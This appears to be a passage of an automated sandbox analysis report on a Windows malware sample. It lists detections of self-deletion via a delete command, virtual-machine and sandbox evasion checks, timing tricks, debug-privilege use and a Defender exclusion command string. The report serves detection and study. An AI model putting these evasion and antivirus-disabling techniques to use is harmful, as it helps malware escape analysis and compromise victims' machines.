Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01

Source: 9LjOeq9jnl.exe

String found in binary or memory: /Installing new files...

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9LjOeq9jnl.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9LjOeq9jnl.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: 9LjOeq9jnl.exe, 00000007.00000002.439553188.00000000033C0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 9LjOeq9jnl.exe, 00000007.00000002.437631998.00000000014CF000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 9LjOeq9jnl.exe, 00000007.00000002.437631998.00000000014CF000.00000040.00000001.sdmp, wscript.exe
Source:	Binary string: wscript.pdb source: 9LjOeq9jnl.exe, 00000007.00000002.439553188.00000000033C0000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 2_2_070C404D push FFFFFF8Bh; iretd	2_2_070C404F
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041B86C push eax; ret	7_2_0041B872
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041B802 push eax; ret	7_2_0041B808
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041B80B push eax; ret	7_2_0041B872
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041D347 push dword ptr [FC8F742Eh]; ret	7_2_0041D380
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041A684 push edx; retf	7_2_0041A686
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041B7B5 push eax; ret	7_2_0041B808
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BBD0D1 push ecx; ret	17_2_04BBD0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AB80B push eax; ret	17_2_009AB872
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AB802 push eax; ret	17_2_009AB808
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AB86C push eax; ret	17_2_009AB872
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AD347 push dword ptr [FC8F742Eh]; ret	17_2_009AD380
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009ABD72 push ds; iretd	17_2_009ABD73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AA684 push edx; retf	17_2_009AA686
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AB7B5 push eax; ret	17_2_009AB808

Source: initial sample

Static PE information: section name: .text entropy: 7.88591901326

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe'			Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.2a91fe4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.305266338.0000000002E42000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9LjOeq9jnl.exe PID: 244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9LjOeq9jnl.exe PID: 4348, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 9LjOeq9jnl.exe, 00000000.00000002.305266338.0000000002E42000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 9LjOeq9jnl.exe, 00000000.00000002.305266338.0000000002E42000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000998604 second address: 000000000099860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 000000000099899E second address: 00000000009989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe TID: 5980	Thread sleep time: -39439s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe TID: 1348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe TID: 5572	Thread sleep time: -45474s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Code function: 7_2_004088D0 rdtsc

7_2_004088D0

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread delayed: delay time: 39439	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread delayed: delay time: 45474	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000008.00000000.379244777.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000008.00000000.356006390.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000008.00000000.393741669.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.379244777.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000008.00000000.393741669.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000008.00000000.358799505.000000000EE50000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
Source: explorer.exe, 00000008.00000000.379244777.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Code function: 7_2_004088D0 rdtsc

7_2_004088D0

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9F0BF mov ecx, dword ptr fs:[00000030h]	17_2_04B9F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9F0BF mov eax, dword ptr fs:[00000030h]	17_2_04B9F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9F0BF mov eax, dword ptr fs:[00000030h]	17_2_04B9F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C38CD6 mov eax, dword ptr fs:[00000030h]	17_2_04C38CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA90AF mov eax, dword ptr fs:[00000030h]	17_2_04BA90AF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0 mov eax, dword ptr fs:[00000030h]	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0 mov eax, dword ptr fs:[00000030h]	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0 mov eax, dword ptr fs:[00000030h]	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0 mov eax, dword ptr fs:[00000030h]	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0 mov eax, dword ptr fs:[00000030h]	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0 mov eax, dword ptr fs:[00000030h]	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7849B mov eax, dword ptr fs:[00000030h]	17_2_04B7849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69080 mov eax, dword ptr fs:[00000030h]	17_2_04B69080
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C214FB mov eax, dword ptr fs:[00000030h]	17_2_04C214FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE3884 mov eax, dword ptr fs:[00000030h]	17_2_04BE3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE3884 mov eax, dword ptr fs:[00000030h]	17_2_04BE3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6CF0 mov eax, dword ptr fs:[00000030h]	17_2_04BE6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6CF0 mov eax, dword ptr fs:[00000030h]	17_2_04BE6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6CF0 mov eax, dword ptr fs:[00000030h]	17_2_04BE6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B658EC mov eax, dword ptr fs:[00000030h]	17_2_04B658EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04BFB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFB8D0 mov ecx, dword ptr fs:[00000030h]	17_2_04BFB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04BFB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04BFB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04BFB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04BFB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9002D mov eax, dword ptr fs:[00000030h]	17_2_04B9002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9002D mov eax, dword ptr fs:[00000030h]	17_2_04B9002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9002D mov eax, dword ptr fs:[00000030h]	17_2_04B9002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9002D mov eax, dword ptr fs:[00000030h]	17_2_04B9002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9002D mov eax, dword ptr fs:[00000030h]	17_2_04B9002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9BC2C mov eax, dword ptr fs:[00000030h]	17_2_04B9BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7B02A mov eax, dword ptr fs:[00000030h]	17_2_04B7B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7B02A mov eax, dword ptr fs:[00000030h]	17_2_04B7B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7B02A mov eax, dword ptr fs:[00000030h]	17_2_04B7B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7B02A mov eax, dword ptr fs:[00000030h]	17_2_04B7B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE7016 mov eax, dword ptr fs:[00000030h]	17_2_04BE7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE7016 mov eax, dword ptr fs:[00000030h]	17_2_04BE7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE7016 mov eax, dword ptr fs:[00000030h]	17_2_04BE7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C22073 mov eax, dword ptr fs:[00000030h]	17_2_04C22073
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6C0A mov eax, dword ptr fs:[00000030h]	17_2_04BE6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6C0A mov eax, dword ptr fs:[00000030h]	17_2_04BE6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6C0A mov eax, dword ptr fs:[00000030h]	17_2_04BE6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6C0A mov eax, dword ptr fs:[00000030h]	17_2_04BE6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C31074 mov eax, dword ptr fs:[00000030h]	17_2_04C31074
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21C06 mov eax, dword ptr fs:[00000030h]	17_2_04C21C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C3740D mov eax, dword ptr fs:[00000030h]	17_2_04C3740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C3740D mov eax, dword ptr fs:[00000030h]	17_2_04C3740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C3740D mov eax, dword ptr fs:[00000030h]	17_2_04C3740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8746D mov eax, dword ptr fs:[00000030h]	17_2_04B8746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C34015 mov eax, dword ptr fs:[00000030h]	17_2_04C34015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C34015 mov eax, dword ptr fs:[00000030h]	17_2_04C34015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B80050 mov eax, dword ptr fs:[00000030h]	17_2_04B80050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B80050 mov eax, dword ptr fs:[00000030h]	17_2_04B80050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFC450 mov eax, dword ptr fs:[00000030h]	17_2_04BFC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFC450 mov eax, dword ptr fs:[00000030h]	17_2_04BFC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9A44B mov eax, dword ptr fs:[00000030h]	17_2_04B9A44B
